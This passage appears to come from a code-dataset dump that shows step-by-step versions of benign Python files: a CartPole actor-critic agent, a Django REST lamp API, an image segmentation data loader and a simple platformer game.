/ (returns.std() + 1e-05)\n for logp_a, value, R in zip(self.logp_as, self.values, returns):\n advantage = R - value.item()\n policy_losses.append(-logp_a * advantage)\n value_losses.append(F.smooth_l1_loss(value, torch.tensor([R]).\n to(Device)))\n self.optimizer.zero_grad()\n loss = torch.stack(policy_losses).sum() + torch.stack(value_losses\n ).sum()\n loss.backward(retain_graph=True)\n self.optimizer.step()\n self.rewards = []\n self.values = []\n self.logp_as = []\n\n\nenv = gym.make('CartPole-v1')\nstate = env.reset()\nlr = 0.03\nEPISODES = 30000\nGAMMA = 0.99\nhidden_sizes = [128, 128]\nshow_every = 100\nAC = ActorCriticNet(env.observation_space, env.action_space, hidden_sizes)\nagent = Agent(AC, lr=lr, gamma=GAMMA)\nfor episode in range(EPISODES):\n done = False\n obs = env.reset()\n I = 1\n T = 0\n episode_reward = 0\n running_reward = 0\n if episode % show_every == 0:\n is_render = True\n else:\n is_render = False\n while not done:\n if is_render:\n env.render('human')\n action = agent.choose_action(obs)\n next_obs, reward, done, _ = env.step(action)\n obs = next_obs\n agent.rewards.append(reward)\n T += 1\n episode_reward += reward\n agent.learn()\n running_reward = 0.05 * episode_reward + (1 - 0.05) * running_reward\n print(f'episode_{episode} \\t ep_reward = {episode_reward} \\t ep_len = {T}')\n if running_reward > env.spec.reward_threshold:\n print(\n 'Solved! Running reward is now {} and the last episode runs to {} time steps!'\n .format(running_reward, T))\n break\n",
"step-5": "import torch.nn as nn\nimport torch\nfrom torch.distributions.categorical import Categorical\nimport torch.nn.functional as F\nfrom torch.optim import Adam\n\nimport gym\nimport numpy as np\n\nDevice = torch.device(\"cuda:0\")\n\nclass ActorCriticNet(nn.Module):\n def __init__(self, observation_space, action_space,\n hidden_sizes=[32,32], activation=nn.Tanh):\n super().__init__()\n\n obs_dim = observation_space.shape[0]\n action_dim = action_space.n\n self.base_net = nn.Sequential(\n nn.Linear(obs_dim, hidden_sizes[0]),\n # nn.Linear(hidden_sizes[0], hidden_sizes[1]),\n )\n self.pi = nn.Linear(hidden_sizes[1], action_dim)\n self.vf = nn.Linear(hidden_sizes[1],1)\n self.to(Device)\n \n def forward(self, obs):\n obs = torch.Tensor(obs).to(Device)\n x = F.relu(self.base_net(obs))\n action_logits = F.softmax(self.pi(x), dim=-1)\n value = self.vf(x)\n return action_logits, value\n\nclass Agent(object):\n def __init__(self, model=None, lr=1e-2, gamma=0.99):\n self.gamma = gamma\n self.AC = model\n self.optimizer = Adam(AC.parameters(), lr=lr)\n self.logp_as = []\n self.values = []\n self.rewards = []\n\n def choose_action(self, obs):\n action_logits, value = self.AC(obs)\n distribution = Categorical(action_logits)\n action = distribution.sample()\n self.logp_as.append(distribution.log_prob(action))\n self.values.append(value)\n return action.item()\n \n def learn(self):\n\n R = 0\n policy_losses = []\n value_losses = []\n returns = []\n\n for r in self.rewards[::-1]:\n R = r + self.gamma * R\n returns.insert(0, R)\n returns = torch.tensor(returns).to(Device)\n returns = (returns - returns.mean()) / (returns.std() + 0.00001)\n\n for logp_a, value, R in zip(self.logp_as, self.values, returns):\n advantage = R - value.item()\n # calculate actor (policy) loss \n policy_losses.append(-logp_a * advantage)\n # calculate critic (value) loss using L1 smooth loss\n value_losses.append(F.smooth_l1_loss(value, torch.tensor([R]).to(Device)))\n\n self.optimizer.zero_grad()\n loss = torch.stack(policy_losses).sum() + torch.stack(value_losses).sum()\n loss.backward(retain_graph=True)\n self.optimizer.step()\n\n self.rewards = []\n self.values = []\n self.logp_as = []\n \n\n# Build env\nenv = gym.make('CartPole-v1')\nstate = env.reset()\n\n# Learning setting\nlr = 3e-2\nEPISODES=30000\nGAMMA = 0.99\nhidden_sizes = [128,128]\nshow_every = 100\n\nAC = ActorCriticNet(env.observation_space, env.action_space, hidden_sizes)\nagent = Agent(AC, lr=lr, gamma=GAMMA)\n\nfor episode in range(EPISODES):\n # For every episode init\n done = False\n obs = env.reset()\n I = 1\n T = 0\n\n # Logs\n episode_reward = 0\n running_reward = 0\n if episode % show_every == 0:\n is_render = True\n else:\n is_render = False\n\n while not done:\n # Render\n if is_render:\n env.render(\"human\")\n \n # Predict action and value\n action = agent.choose_action(obs)\n\n # Step the env\n next_obs, reward, done, _ = env.step(action)\n\n # Update obs\n obs = next_obs\n agent.rewards.append(reward)\n T += 1\n\n # Logs\n episode_reward += reward\n \n # Learn once\n agent.learn()\n\n # Update cumulative reward\n running_reward = 0.05 * episode_reward + (1 - 0.05) * running_reward\n \n print(f\"episode_{episode} \\t ep_reward = {episode_reward} \\t ep_len = {T}\")\n if running_reward > env.spec.reward_threshold:\n print(\"Solved! Running reward is now {} and \"\n \"the last episode runs to {} time steps!\".format(running_reward, T))\n break\n",
"step-ids": [
4,
7,
8,
10,
11
]
}
|
[
4,
7,
8,
10,
11
] |
<|reserved_special_token_0|>
class LampViewSet(viewsets.ModelViewSet):
serializer_class = LampSerializer
queryset = Lamp.objects.all()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class LampSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = Lamp
fields = '__all__'
class LampViewSet(viewsets.ModelViewSet):
serializer_class = LampSerializer
queryset = Lamp.objects.all()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class LampSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = Lamp
fields = '__all__'
class LampViewSet(viewsets.ModelViewSet):
serializer_class = LampSerializer
queryset = Lamp.objects.all()
router = routers.DefaultRouter()
router.register('lamps', LampViewSet)
<|reserved_special_token_1|>
from rest_framework import serializers, viewsets, routers
from lamp_control.models import Lamp
class LampSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = Lamp
fields = '__all__'
class LampViewSet(viewsets.ModelViewSet):
serializer_class = LampSerializer
queryset = Lamp.objects.all()
router = routers.DefaultRouter()
router.register('lamps', LampViewSet)
<|reserved_special_token_1|>
from rest_framework import serializers, viewsets, routers
from lamp_control.models import Lamp
class LampSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = Lamp
fields = '__all__'
class LampViewSet(viewsets.ModelViewSet):
serializer_class = LampSerializer
queryset = Lamp.objects.all()
router = routers.DefaultRouter()
router.register(r'lamps', LampViewSet)
|
flexible
|
{
"blob_id": "aff1d702e591efcfc0fc93150a3fbec532408137",
"index": 55,
"step-1": "<mask token>\n\n\nclass LampViewSet(viewsets.ModelViewSet):\n serializer_class = LampSerializer\n queryset = Lamp.objects.all()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass LampSerializer(serializers.HyperlinkedModelSerializer):\n\n\n class Meta:\n model = Lamp\n fields = '__all__'\n\n\nclass LampViewSet(viewsets.ModelViewSet):\n serializer_class = LampSerializer\n queryset = Lamp.objects.all()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass LampSerializer(serializers.HyperlinkedModelSerializer):\n\n\n class Meta:\n model = Lamp\n fields = '__all__'\n\n\nclass LampViewSet(viewsets.ModelViewSet):\n serializer_class = LampSerializer\n queryset = Lamp.objects.all()\n\n\nrouter = routers.DefaultRouter()\nrouter.register('lamps', LampViewSet)\n",
"step-4": "from rest_framework import serializers, viewsets, routers\nfrom lamp_control.models import Lamp\n\n\nclass LampSerializer(serializers.HyperlinkedModelSerializer):\n\n\n class Meta:\n model = Lamp\n fields = '__all__'\n\n\nclass LampViewSet(viewsets.ModelViewSet):\n serializer_class = LampSerializer\n queryset = Lamp.objects.all()\n\n\nrouter = routers.DefaultRouter()\nrouter.register('lamps', LampViewSet)\n",
"step-5": "from rest_framework import serializers, viewsets, routers\n\nfrom lamp_control.models import Lamp\n\n\nclass LampSerializer(serializers.HyperlinkedModelSerializer):\n class Meta:\n model = Lamp\n fields = '__all__'\n\n\nclass LampViewSet(viewsets.ModelViewSet):\n serializer_class = LampSerializer\n queryset = Lamp.objects.all()\n\n\nrouter = routers.DefaultRouter()\nrouter.register(r'lamps', LampViewSet)\n",
"step-ids": [
2,
3,
5,
6,
7
]
}
|
[
2,
3,
5,
6,
7
] |
<|reserved_special_token_0|>
class Datalayer(BaseDataLayer):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def __getitem__(self, item):
if np.random.random() > 0.5 and len(self.bg_masks_path) > 0:
random_id_bg = np.random.randint(0, len(self.bg_imgs_path))
img_path, mask_path = self.bg_imgs_path[random_id_bg
], self.bg_masks_path[random_id_bg]
else:
random_id_ng = np.random.randint(0, len(self.ng_imgs_path))
img_path, mask_path = self.ng_imgs_path[random_id_ng
], self.ng_masks_path[random_id_ng]
img = cv2.imread(img_path)
mask = cv2.imread(mask_path)
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
if self.augmentation:
sample = self.augmentation(image=img, mask=mask)
img, mask = sample['image'], sample['mask']
if self.preprocessing:
sample = self.preprocessing(image=img, mask=mask)
img, mask = sample['image'], sample['mask']
return img, mask
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Datalayer(BaseDataLayer):
<|reserved_special_token_0|>
def __len__(self):
return len(self.bg_masks_path) + len(self.ng_masks_path)
def __getitem__(self, item):
if np.random.random() > 0.5 and len(self.bg_masks_path) > 0:
random_id_bg = np.random.randint(0, len(self.bg_imgs_path))
img_path, mask_path = self.bg_imgs_path[random_id_bg
], self.bg_masks_path[random_id_bg]
else:
random_id_ng = np.random.randint(0, len(self.ng_imgs_path))
img_path, mask_path = self.ng_imgs_path[random_id_ng
], self.ng_masks_path[random_id_ng]
img = cv2.imread(img_path)
mask = cv2.imread(mask_path)
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
if self.augmentation:
sample = self.augmentation(image=img, mask=mask)
img, mask = sample['image'], sample['mask']
if self.preprocessing:
sample = self.preprocessing(image=img, mask=mask)
img, mask = sample['image'], sample['mask']
return img, mask
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Datalayer(BaseDataLayer):
def __init__(self, config, augmentation=None, preprocessing=None):
super(Datalayer, self).__init__()
self.config = config
train_dir = self.config['Dataset']['TrainPath']
bg_imgs_dir = os.path.join(train_dir, 'bg')
mask_suffix = '_mask.png'
img_suffix = '.png'
self.bg_masks_path = [os.path.join(bg_imgs_dir, bg_mask_name) for
bg_mask_name in os.listdir(bg_imgs_dir) if bg_mask_name.
endswith(mask_suffix)]
self.bg_imgs_path = [bg_mask_path.replace(mask_suffix, img_suffix) for
bg_mask_path in self.bg_masks_path]
ng_imgs_dir = os.path.join(train_dir, 'ng')
self.ng_masks_path = [os.path.join(ng_imgs_dir, ng_img_name) for
ng_img_name in os.listdir(ng_imgs_dir) if ng_img_name.endswith(
mask_suffix)]
self.ng_imgs_path = [ng_mask_path.replace(mask_suffix, img_suffix) for
ng_mask_path in self.ng_masks_path]
self.augmentation = augmentation
self.preprocessing = preprocessing
def __len__(self):
return len(self.bg_masks_path) + len(self.ng_masks_path)
def __getitem__(self, item):
if np.random.random() > 0.5 and len(self.bg_masks_path) > 0:
random_id_bg = np.random.randint(0, len(self.bg_imgs_path))
img_path, mask_path = self.bg_imgs_path[random_id_bg
], self.bg_masks_path[random_id_bg]
else:
random_id_ng = np.random.randint(0, len(self.ng_imgs_path))
img_path, mask_path = self.ng_imgs_path[random_id_ng
], self.ng_masks_path[random_id_ng]
img = cv2.imread(img_path)
mask = cv2.imread(mask_path)
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
if self.augmentation:
sample = self.augmentation(image=img, mask=mask)
img, mask = sample['image'], sample['mask']
if self.preprocessing:
sample = self.preprocessing(image=img, mask=mask)
img, mask = sample['image'], sample['mask']
return img, mask
<|reserved_special_token_1|>
import os
import cv2
import numpy as np
import torch
import torch.utils.data
import torchvision
from torchvision import transforms
from utils.utils import loadYaml
from .base_datalayer import BaseDataLayer
import albumentations as albu
class Datalayer(BaseDataLayer):
def __init__(self, config, augmentation=None, preprocessing=None):
super(Datalayer, self).__init__()
self.config = config
train_dir = self.config['Dataset']['TrainPath']
bg_imgs_dir = os.path.join(train_dir, 'bg')
mask_suffix = '_mask.png'
img_suffix = '.png'
self.bg_masks_path = [os.path.join(bg_imgs_dir, bg_mask_name) for
bg_mask_name in os.listdir(bg_imgs_dir) if bg_mask_name.
endswith(mask_suffix)]
self.bg_imgs_path = [bg_mask_path.replace(mask_suffix, img_suffix) for
bg_mask_path in self.bg_masks_path]
ng_imgs_dir = os.path.join(train_dir, 'ng')
self.ng_masks_path = [os.path.join(ng_imgs_dir, ng_img_name) for
ng_img_name in os.listdir(ng_imgs_dir) if ng_img_name.endswith(
mask_suffix)]
self.ng_imgs_path = [ng_mask_path.replace(mask_suffix, img_suffix) for
ng_mask_path in self.ng_masks_path]
self.augmentation = augmentation
self.preprocessing = preprocessing
def __len__(self):
return len(self.bg_masks_path) + len(self.ng_masks_path)
def __getitem__(self, item):
if np.random.random() > 0.5 and len(self.bg_masks_path) > 0:
random_id_bg = np.random.randint(0, len(self.bg_imgs_path))
img_path, mask_path = self.bg_imgs_path[random_id_bg
], self.bg_masks_path[random_id_bg]
else:
random_id_ng = np.random.randint(0, len(self.ng_imgs_path))
img_path, mask_path = self.ng_imgs_path[random_id_ng
], self.ng_masks_path[random_id_ng]
img = cv2.imread(img_path)
mask = cv2.imread(mask_path)
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
if self.augmentation:
sample = self.augmentation(image=img, mask=mask)
img, mask = sample['image'], sample['mask']
if self.preprocessing:
sample = self.preprocessing(image=img, mask=mask)
img, mask = sample['image'], sample['mask']
return img, mask
<|reserved_special_token_1|>
import os
import cv2
import numpy as np
import torch
import torch.utils.data
import torchvision
from torchvision import transforms
from utils.utils import loadYaml
from .base_datalayer import BaseDataLayer
import albumentations as albu
class Datalayer(BaseDataLayer):
def __init__(self, config, augmentation=None, preprocessing=None):
super(Datalayer, self).__init__()
self.config = config
train_dir = self.config['Dataset']['TrainPath']
bg_imgs_dir = os.path.join(train_dir, 'bg')
mask_suffix = '_mask.png'
img_suffix = '.png'
self.bg_masks_path = [os.path.join(bg_imgs_dir, bg_mask_name) for bg_mask_name in os.listdir(bg_imgs_dir) if
bg_mask_name.endswith(mask_suffix)]
self.bg_imgs_path = [bg_mask_path.replace(mask_suffix, img_suffix) for bg_mask_path in self.bg_masks_path]
ng_imgs_dir = os.path.join(train_dir, 'ng')
self.ng_masks_path = [os.path.join(ng_imgs_dir, ng_img_name) for ng_img_name in os.listdir(ng_imgs_dir) if
ng_img_name.endswith(mask_suffix)]
self.ng_imgs_path = [ng_mask_path.replace(mask_suffix, img_suffix) for ng_mask_path in self.ng_masks_path]
self.augmentation = augmentation
self.preprocessing = preprocessing
def __len__(self):
return len(self.bg_masks_path) + len(self.ng_masks_path)
def __getitem__(self, item):
# bg
if np.random.random() > 0.5 and len(self.bg_masks_path) > 0:
random_id_bg = np.random.randint(0, len(self.bg_imgs_path))
img_path, mask_path = self.bg_imgs_path[random_id_bg], self.bg_masks_path[random_id_bg]
# ng
else:
random_id_ng = np.random.randint(0, len(self.ng_imgs_path))
img_path, mask_path = self.ng_imgs_path[random_id_ng], self.ng_masks_path[random_id_ng]
img = cv2.imread(img_path)
mask = cv2.imread(mask_path)
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
# apply augmentations
if self.augmentation:
sample = self.augmentation(image=img, mask=mask)
img, mask = sample['image'], sample['mask']
# apply preprocessing
if self.preprocessing:
sample = self.preprocessing(image=img, mask=mask)
img, mask = sample['image'], sample['mask']
return img, mask
|
flexible
|
{
"blob_id": "9928eaa32468453f405d8bb650f3e0e85a7933bf",
"index": 5514,
"step-1": "<mask token>\n\n\nclass Datalayer(BaseDataLayer):\n <mask token>\n <mask token>\n\n def __getitem__(self, item):\n if np.random.random() > 0.5 and len(self.bg_masks_path) > 0:\n random_id_bg = np.random.randint(0, len(self.bg_imgs_path))\n img_path, mask_path = self.bg_imgs_path[random_id_bg\n ], self.bg_masks_path[random_id_bg]\n else:\n random_id_ng = np.random.randint(0, len(self.ng_imgs_path))\n img_path, mask_path = self.ng_imgs_path[random_id_ng\n ], self.ng_masks_path[random_id_ng]\n img = cv2.imread(img_path)\n mask = cv2.imread(mask_path)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n if self.augmentation:\n sample = self.augmentation(image=img, mask=mask)\n img, mask = sample['image'], sample['mask']\n if self.preprocessing:\n sample = self.preprocessing(image=img, mask=mask)\n img, mask = sample['image'], sample['mask']\n return img, mask\n",
"step-2": "<mask token>\n\n\nclass Datalayer(BaseDataLayer):\n <mask token>\n\n def __len__(self):\n return len(self.bg_masks_path) + len(self.ng_masks_path)\n\n def __getitem__(self, item):\n if np.random.random() > 0.5 and len(self.bg_masks_path) > 0:\n random_id_bg = np.random.randint(0, len(self.bg_imgs_path))\n img_path, mask_path = self.bg_imgs_path[random_id_bg\n ], self.bg_masks_path[random_id_bg]\n else:\n random_id_ng = np.random.randint(0, len(self.ng_imgs_path))\n img_path, mask_path = self.ng_imgs_path[random_id_ng\n ], self.ng_masks_path[random_id_ng]\n img = cv2.imread(img_path)\n mask = cv2.imread(mask_path)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n if self.augmentation:\n sample = self.augmentation(image=img, mask=mask)\n img, mask = sample['image'], sample['mask']\n if self.preprocessing:\n sample = self.preprocessing(image=img, mask=mask)\n img, mask = sample['image'], sample['mask']\n return img, mask\n",
"step-3": "<mask token>\n\n\nclass Datalayer(BaseDataLayer):\n\n def __init__(self, config, augmentation=None, preprocessing=None):\n super(Datalayer, self).__init__()\n self.config = config\n train_dir = self.config['Dataset']['TrainPath']\n bg_imgs_dir = os.path.join(train_dir, 'bg')\n mask_suffix = '_mask.png'\n img_suffix = '.png'\n self.bg_masks_path = [os.path.join(bg_imgs_dir, bg_mask_name) for\n bg_mask_name in os.listdir(bg_imgs_dir) if bg_mask_name.\n endswith(mask_suffix)]\n self.bg_imgs_path = [bg_mask_path.replace(mask_suffix, img_suffix) for\n bg_mask_path in self.bg_masks_path]\n ng_imgs_dir = os.path.join(train_dir, 'ng')\n self.ng_masks_path = [os.path.join(ng_imgs_dir, ng_img_name) for\n ng_img_name in os.listdir(ng_imgs_dir) if ng_img_name.endswith(\n mask_suffix)]\n self.ng_imgs_path = [ng_mask_path.replace(mask_suffix, img_suffix) for\n ng_mask_path in self.ng_masks_path]\n self.augmentation = augmentation\n self.preprocessing = preprocessing\n\n def __len__(self):\n return len(self.bg_masks_path) + len(self.ng_masks_path)\n\n def __getitem__(self, item):\n if np.random.random() > 0.5 and len(self.bg_masks_path) > 0:\n random_id_bg = np.random.randint(0, len(self.bg_imgs_path))\n img_path, mask_path = self.bg_imgs_path[random_id_bg\n ], self.bg_masks_path[random_id_bg]\n else:\n random_id_ng = np.random.randint(0, len(self.ng_imgs_path))\n img_path, mask_path = self.ng_imgs_path[random_id_ng\n ], self.ng_masks_path[random_id_ng]\n img = cv2.imread(img_path)\n mask = cv2.imread(mask_path)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n if self.augmentation:\n sample = self.augmentation(image=img, mask=mask)\n img, mask = sample['image'], sample['mask']\n if self.preprocessing:\n sample = self.preprocessing(image=img, mask=mask)\n img, mask = sample['image'], sample['mask']\n return img, mask\n",
"step-4": "import os\nimport cv2\nimport numpy as np\nimport torch\nimport torch.utils.data\nimport torchvision\nfrom torchvision import transforms\nfrom utils.utils import loadYaml\nfrom .base_datalayer import BaseDataLayer\nimport albumentations as albu\n\n\nclass Datalayer(BaseDataLayer):\n\n def __init__(self, config, augmentation=None, preprocessing=None):\n super(Datalayer, self).__init__()\n self.config = config\n train_dir = self.config['Dataset']['TrainPath']\n bg_imgs_dir = os.path.join(train_dir, 'bg')\n mask_suffix = '_mask.png'\n img_suffix = '.png'\n self.bg_masks_path = [os.path.join(bg_imgs_dir, bg_mask_name) for\n bg_mask_name in os.listdir(bg_imgs_dir) if bg_mask_name.\n endswith(mask_suffix)]\n self.bg_imgs_path = [bg_mask_path.replace(mask_suffix, img_suffix) for\n bg_mask_path in self.bg_masks_path]\n ng_imgs_dir = os.path.join(train_dir, 'ng')\n self.ng_masks_path = [os.path.join(ng_imgs_dir, ng_img_name) for\n ng_img_name in os.listdir(ng_imgs_dir) if ng_img_name.endswith(\n mask_suffix)]\n self.ng_imgs_path = [ng_mask_path.replace(mask_suffix, img_suffix) for\n ng_mask_path in self.ng_masks_path]\n self.augmentation = augmentation\n self.preprocessing = preprocessing\n\n def __len__(self):\n return len(self.bg_masks_path) + len(self.ng_masks_path)\n\n def __getitem__(self, item):\n if np.random.random() > 0.5 and len(self.bg_masks_path) > 0:\n random_id_bg = np.random.randint(0, len(self.bg_imgs_path))\n img_path, mask_path = self.bg_imgs_path[random_id_bg\n ], self.bg_masks_path[random_id_bg]\n else:\n random_id_ng = np.random.randint(0, len(self.ng_imgs_path))\n img_path, mask_path = self.ng_imgs_path[random_id_ng\n ], self.ng_masks_path[random_id_ng]\n img = cv2.imread(img_path)\n mask = cv2.imread(mask_path)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n if self.augmentation:\n sample = self.augmentation(image=img, mask=mask)\n img, mask = sample['image'], sample['mask']\n if self.preprocessing:\n sample = self.preprocessing(image=img, mask=mask)\n img, mask = sample['image'], sample['mask']\n return img, mask\n",
"step-5": "import os\nimport cv2\nimport numpy as np\nimport torch\nimport torch.utils.data\nimport torchvision\nfrom torchvision import transforms\nfrom utils.utils import loadYaml\nfrom .base_datalayer import BaseDataLayer\nimport albumentations as albu\n\n\nclass Datalayer(BaseDataLayer):\n\n def __init__(self, config, augmentation=None, preprocessing=None):\n super(Datalayer, self).__init__()\n self.config = config\n train_dir = self.config['Dataset']['TrainPath']\n\n bg_imgs_dir = os.path.join(train_dir, 'bg')\n\n mask_suffix = '_mask.png'\n img_suffix = '.png'\n self.bg_masks_path = [os.path.join(bg_imgs_dir, bg_mask_name) for bg_mask_name in os.listdir(bg_imgs_dir) if\n bg_mask_name.endswith(mask_suffix)]\n self.bg_imgs_path = [bg_mask_path.replace(mask_suffix, img_suffix) for bg_mask_path in self.bg_masks_path]\n\n ng_imgs_dir = os.path.join(train_dir, 'ng')\n self.ng_masks_path = [os.path.join(ng_imgs_dir, ng_img_name) for ng_img_name in os.listdir(ng_imgs_dir) if\n ng_img_name.endswith(mask_suffix)]\n self.ng_imgs_path = [ng_mask_path.replace(mask_suffix, img_suffix) for ng_mask_path in self.ng_masks_path]\n\n self.augmentation = augmentation\n self.preprocessing = preprocessing\n\n def __len__(self):\n return len(self.bg_masks_path) + len(self.ng_masks_path)\n\n def __getitem__(self, item):\n # bg\n if np.random.random() > 0.5 and len(self.bg_masks_path) > 0:\n random_id_bg = np.random.randint(0, len(self.bg_imgs_path))\n img_path, mask_path = self.bg_imgs_path[random_id_bg], self.bg_masks_path[random_id_bg]\n # ng\n else:\n random_id_ng = np.random.randint(0, len(self.ng_imgs_path))\n img_path, mask_path = self.ng_imgs_path[random_id_ng], self.ng_masks_path[random_id_ng]\n\n img = cv2.imread(img_path)\n mask = cv2.imread(mask_path)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n\n # apply augmentations\n if self.augmentation:\n sample = self.augmentation(image=img, mask=mask)\n img, mask = sample['image'], sample['mask']\n # apply preprocessing\n if self.preprocessing:\n sample = self.preprocessing(image=img, mask=mask)\n img, mask = sample['image'], sample['mask']\n return img, mask\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
from platform_class import *
from player_class import *
from functions import *
delay = 3000
startOfGame = False
# def keyPressed():
# startOfGame = True
# print(startOfGame)
# if (keyCode == 'B'):
# print("I am pressed")
# startOfGame = True
def mousePressed():
global platforms
platforms = []
starter_platform = platform([100, 700])
platforms.append(starter_platform)
global p1
p1 = player()
loop()
def setup():
#global setup options
size(500, 800)
rectMode(CENTER)
# sb = loadImage("assets\\gameover.jpg")
# sb.resize(width, height)
# background(sb)
global atStartUp
atStartUp = True
global startTimeMs
startTimeMs = millis()
global bg, go, sb
bg = loadImage("assets\\background.png")
bg.resize(width, height)
go = loadImage("assets\\gameover.jpg")
go.resize(width, height)
sb = loadImage("assets\\start.png")
sb.resize(width, height)
global startOfGame
startOfGame = False
#list of platforms
global platforms
platforms = []
starter_platform = platform([100, 700])
platforms.append(starter_platform)
global p1
p1 = player()
def draw():
global atStartUp
if (atStartUp):
currentTimeMs = millis()
startUpTimeRemaining = delay - (currentTimeMs - startTimeMs)
startScreen(startUpTimeRemaining)
atStartUp = startUpTimeRemaining > 0
return
frameRate(30)
background(bg)
for platform in platforms:
# print (len(platforms))
platform.display()
p1.update(platforms)
platform_manager(platforms)
#this ends the game if the player falls off the screen
if p1.ypos > height+25:
background(go)
fill(255, 255, 255)
textAlign(CENTER, CENTER)
textSize(80)
text("GAME", width/2, 2*height/10)
text("OVER", width/2, 3*height/10)
textSize(30)
fill(240,225,48)
text("Score: "+str(p1.score/100), width/2, 0.5*height/10)
textSize(20)
fill(255, 255, 255)
text("Click anywhere on the screen to RETRY", width/2, 8*height/10)
text("Press ESC to exit", width/2, 8.5*height/10)
textSize(10)
fill(240,225,48)
text("Made by Priyam Sahoo", width/2, 9.5*height/10)
textAlign(LEFT)
noLoop()
def startScreen(remainingTime):
background(sb)
fill(0)
textAlign(CENTER, CENTER)
textSize(40)
fill(240,225,48)
text("Welcome to Fallin't", width/2, 0.25*height/2)
textSize(100)
fill(50, 50, 50)
text(ceil(remainingTime / 1000.0), width/2, 1.65*height/2)
|
normal
|
{
"blob_id": "850251338e8af841a5214b37610d1b6fba572aa5",
"index": 1138,
"step-1": "<mask token>\n\n\ndef setup():\n size(500, 800)\n rectMode(CENTER)\n global atStartUp\n atStartUp = True\n global startTimeMs\n startTimeMs = millis()\n global bg, go, sb\n bg = loadImage('assets\\\\background.png')\n bg.resize(width, height)\n go = loadImage('assets\\\\gameover.jpg')\n go.resize(width, height)\n sb = loadImage('assets\\\\start.png')\n sb.resize(width, height)\n global startOfGame\n startOfGame = False\n global platforms\n platforms = []\n starter_platform = platform([100, 700])\n platforms.append(starter_platform)\n global p1\n p1 = player()\n\n\ndef draw():\n global atStartUp\n if atStartUp:\n currentTimeMs = millis()\n startUpTimeRemaining = delay - (currentTimeMs - startTimeMs)\n startScreen(startUpTimeRemaining)\n atStartUp = startUpTimeRemaining > 0\n return\n frameRate(30)\n background(bg)\n for platform in platforms:\n platform.display()\n p1.update(platforms)\n platform_manager(platforms)\n if p1.ypos > height + 25:\n background(go)\n fill(255, 255, 255)\n textAlign(CENTER, CENTER)\n textSize(80)\n text('GAME', width / 2, 2 * height / 10)\n text('OVER', width / 2, 3 * height / 10)\n textSize(30)\n fill(240, 225, 48)\n text('Score: ' + str(p1.score / 100), width / 2, 0.5 * height / 10)\n textSize(20)\n fill(255, 255, 255)\n text('Click anywhere on the screen to RETRY', width / 2, 8 * height /\n 10)\n text('Press ESC to exit', width / 2, 8.5 * height / 10)\n textSize(10)\n fill(240, 225, 48)\n text('Made by Priyam Sahoo', width / 2, 9.5 * height / 10)\n textAlign(LEFT)\n noLoop()\n\n\ndef startScreen(remainingTime):\n background(sb)\n fill(0)\n textAlign(CENTER, CENTER)\n textSize(40)\n fill(240, 225, 48)\n text(\"Welcome to Fallin't\", width / 2, 0.25 * height / 2)\n textSize(100)\n fill(50, 50, 50)\n text(ceil(remainingTime / 1000.0), width / 2, 1.65 * height / 2)\n",
"step-2": "<mask token>\n\n\ndef mousePressed():\n global platforms\n platforms = []\n starter_platform = platform([100, 700])\n platforms.append(starter_platform)\n global p1\n p1 = player()\n loop()\n\n\ndef setup():\n size(500, 800)\n rectMode(CENTER)\n global atStartUp\n atStartUp = True\n global startTimeMs\n startTimeMs = millis()\n global bg, go, sb\n bg = loadImage('assets\\\\background.png')\n bg.resize(width, height)\n go = loadImage('assets\\\\gameover.jpg')\n go.resize(width, height)\n sb = loadImage('assets\\\\start.png')\n sb.resize(width, height)\n global startOfGame\n startOfGame = False\n global platforms\n platforms = []\n starter_platform = platform([100, 700])\n platforms.append(starter_platform)\n global p1\n p1 = player()\n\n\ndef draw():\n global atStartUp\n if atStartUp:\n currentTimeMs = millis()\n startUpTimeRemaining = delay - (currentTimeMs - startTimeMs)\n startScreen(startUpTimeRemaining)\n atStartUp = startUpTimeRemaining > 0\n return\n frameRate(30)\n background(bg)\n for platform in platforms:\n platform.display()\n p1.update(platforms)\n platform_manager(platforms)\n if p1.ypos > height + 25:\n background(go)\n fill(255, 255, 255)\n textAlign(CENTER, CENTER)\n textSize(80)\n text('GAME', width / 2, 2 * height / 10)\n text('OVER', width / 2, 3 * height / 10)\n textSize(30)\n fill(240, 225, 48)\n text('Score: ' + str(p1.score / 100), width / 2, 0.5 * height / 10)\n textSize(20)\n fill(255, 255, 255)\n text('Click anywhere on the screen to RETRY', width / 2, 8 * height /\n 10)\n text('Press ESC to exit', width / 2, 8.5 * height / 10)\n textSize(10)\n fill(240, 225, 48)\n text('Made by Priyam Sahoo', width / 2, 9.5 * height / 10)\n textAlign(LEFT)\n noLoop()\n\n\ndef startScreen(remainingTime):\n background(sb)\n fill(0)\n textAlign(CENTER, CENTER)\n textSize(40)\n fill(240, 225, 48)\n text(\"Welcome to Fallin't\", width / 2, 0.25 * height / 2)\n textSize(100)\n fill(50, 50, 50)\n text(ceil(remainingTime / 1000.0), width / 2, 1.65 * height / 2)\n",
